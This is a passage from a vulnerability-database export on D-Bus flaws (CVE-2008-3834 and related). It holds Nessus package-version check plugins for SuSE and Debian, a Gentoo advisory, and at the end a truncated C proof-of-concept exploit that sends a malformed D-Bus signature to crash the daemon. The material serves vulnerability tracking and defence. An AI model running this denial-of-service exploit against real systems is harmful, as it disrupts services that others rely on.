flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-glib-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-gtk-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-java-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-mono-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-python-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-qt3-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-qt3-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-x11-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.29.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T05:57:38", "description": "Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.", "edition": 22, "published": "2011-04-29T00:00:00", "title": "SuSE 11.1 Security Update : dbus (SAT Patch Number 4434)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4352", "CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:dbus-1-x11", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:dbus-1", "p-cpe:/a:novell:suse_linux:11:dbus-1-32bit"], "id": "SUSE_11_DBUS-1-110418.NASL", "href": "https://www.tenable.com/plugins/nessus/53587", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53587);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/25 13:36:42\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\", \"CVE-2010-4352\");\n\n script_name(english:\"SuSE 11.1 Security Update : dbus (SAT Patch Number 4434)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=495804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=595681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=659934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3834.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1189.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4352.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4434.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:dbus-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:dbus-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:dbus-1-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"dbus-1-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"dbus-1-x11-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-32bit-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-x11-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"dbus-1-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"dbus-1-x11-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"dbus-1-32bit-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-32bit-1.2.10-3.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T06:29:46", "description": "This update fixes a denial of service bug in dbus. (CVE-2008-3834)", "edition": 20, "published": "2008-12-04T00:00:00", "title": "SuSE 10 Security Update : dbus (ZYPP Patch Number 5701)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DBUS-1-5701.NASL", "href": "https://www.tenable.com/plugins/nessus/35034", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35034);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2019/10/25 13:36:32\");\n\n script_cve_id(\"CVE-2008-3834\");\n\n script_name(english:\"SuSE 10 Security Update : dbus (ZYPP Patch Number 5701)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This update fixes a denial of service bug in dbus. (CVE-2008-3834)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3834.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5701.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-devel-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-glib-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-gtk-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-mono-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-python-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-qt3-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-qt3-devel-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-x11-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-devel-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-glib-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-gtk-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-mono-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-python-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-qt-4.3.4-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-qt3-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-qt3-devel-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-x11-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-qt-32bit-4.3.4-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-devel-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-glib-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-gtk-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-java-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-mono-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-python-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-qt3-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-qt3-devel-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-x11-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-devel-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-glib-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-gtk-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-java-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-mono-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-python-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-qt-4.3.4-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-qt3-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-qt3-devel-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-x11-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-qt-32bit-4.3.4-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T05:51:07", "description": "This update fixes a denial of service bug in dbus. (CVE-2008-3834)", "edition": 20, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : dbus-1 (dbus-1-246)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:dbus-1-32bit", "p-cpe:/a:novell:opensuse:dbus-1-x11", "p-cpe:/a:novell:opensuse:dbus-1", "p-cpe:/a:novell:opensuse:dbus-1-devel"], "id": "SUSE_11_0_DBUS-1-081016.NASL", "href": "https://www.tenable.com/plugins/nessus/39947", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dbus-1-246.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39947);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:31\");\n\n script_cve_id(\"CVE-2008-3834\");\n\n script_name(english:\"openSUSE Security Update : dbus-1 (dbus-1-246)\");\n script_summary(english:\"Check for the dbus-1-246 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This update fixes a denial of service bug in dbus. (CVE-2008-3834)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=432901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dbus-1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dbus-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dbus-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dbus-1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dbus-1-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dbus-1-1.2.1-15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dbus-1-devel-1.2.1-15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dbus-1-x11-1.2.1-18.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"dbus-1-32bit-1.2.1-15.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-1\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:45:08", "description": "Colin Walters discovered that the dbus_signature_validate function in\ndbus, a simple interprocess messaging system, is prone to a denial of\nservice attack.", "edition": 25, "published": "2008-10-24T00:00:00", "title": "Debian DSA-1658-1 : dbus - programming error", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "modified": "2008-10-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:dbus"], "id": "DEBIAN_DSA-1658.NASL", "href": "https://www.tenable.com/plugins/nessus/34478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1658. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34478);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3834\");\n script_xref(name:\"DSA\", value:\"1658\");\n\n script_name(english:\"Debian DSA-1658-1 : dbus - programming error\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Colin Walters discovered that the dbus_signature_validate function in\ndbus, a simple interprocess messaging system, is prone to a denial of\nservice attack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=501443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1658\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the dbus package.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 1.0.2-1+etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"dbus\", reference:\"1.0.2-1+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"dbus-1-doc\", reference:\"1.0.2-1+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"dbus-1-utils\", reference:\"1.0.2-1+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbus-1-3\", reference:\"1.0.2-1+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbus-1-dev\", reference:\"1.0.2-1+etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "### Background\n\nD-Bus is a daemon providing a framework for applications to communicate with one another. \n\n### Description\n\nschelte reported that the dbus_signature_validate() function can trigger a failed assertion when processing a message containing a malformed signature. \n\n### Impact\n\nA local user could send a specially crafted message to the D-Bus daemon, leading to a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll D-Bus users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/dbus-1.2.3-r1\"", "edition": 1, "modified": "2009-01-11T00:00:00", "published": "2009-01-11T00:00:00", "id": "GLSA-200901-04", "href": "https://security.gentoo.org/glsa/200901-04", "type": "gentoo", "title": "D-Bus: Denial of Service", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:49", "description": "", "published": "2009-01-20T00:00:00", "type": "packetstorm", "title": "D-Bus Daemon Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2009-01-20T00:00:00", "id": "PACKETSTORM:74119", "href": "https://packetstormsecurity.com/files/74119/D-Bus-Daemon-Denial-Of-Service.html", "sourceData": "`/* \n* cve-2008-3834.c \n* \n* D-Bus Daemon Denial of Service < 1.2.4 \n* Jon Oberheide <jon@oberheide.org> \n* http://jon.oberheide.org \n* \n* Usage: \n* \n* $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834 \n* $ ./cve-2008-3834 \n* \n* Information: \n* \n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834 \n* \n* The dbus_signature_validate function in the D-bus library (libdbus) \n* before 1.2.4 allows remote attackers to cause a denial of service \n* (application abort) via a message containing a malformed signature, \n* which triggers a failed assertion error. \n* \n*/ \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <stdint.h> \n#include <string.h> \n \n#include <dbus/dbus.h> \n \n#define DEST \"org.freedesktop.ExampleService\" \n#define NAME \"org.freedesktop.ExampleInterface.ExampleMethod\" \n#define PATH \"/org/freedesktop/sample/object/name\" \n#define SIGNAL \"ExampleMethod\" \n \nint \nmain(int argc, char *argv[]) \n{ \nchar sig[8]; \nuint32_t val = 0xdeadbeef; \nDBusMessage *message; \nDBusConnection *system, *session; \nDBusMessageIter iter1, iter2, iter3, iter4; \n \nprintf(\"[+] creating malicious dbus message...\\n\"); \n \nmessage = dbus_message_new_signal(PATH, NAME, SIGNAL); \nif (!message) { \nprintf(\"[-] error: could not create dbus message\\n\"); \nreturn 1; \n} \nif (!dbus_message_set_destination(message, DEST)) { \nprintf(\"[-] error: could not create set dbus destination\\n\"); \nreturn 1; \n} \n \nsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR; \nsig[1] = DBUS_STRUCT_BEGIN_CHAR; \nsig[2] = DBUS_TYPE_INT32; \nsig[3] = DBUS_TYPE_INT32; \nsig[4] = DBUS_STRUCT_END_CHAR; \nsig[5] = DBUS_TYPE_INT32; \nsig[6] = DBUS_DICT_ENTRY_END_CHAR; \nsig[7] = '\\0'; \n \ndbus_message_iter_init_append(message, &iter1); \ndbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2); \ndbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3); \ndbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4); \ndbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val); \ndbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, 